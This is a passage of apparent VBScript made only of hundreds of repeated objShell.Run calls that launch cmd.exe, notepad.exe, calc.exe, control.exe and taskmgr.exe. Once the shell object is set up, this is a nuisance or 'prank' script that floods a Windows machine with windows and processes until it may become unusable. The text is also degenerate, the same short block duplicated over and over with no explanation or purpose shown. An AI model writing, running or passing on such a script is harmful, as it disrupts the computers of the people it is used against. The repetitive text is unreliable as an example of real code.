objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
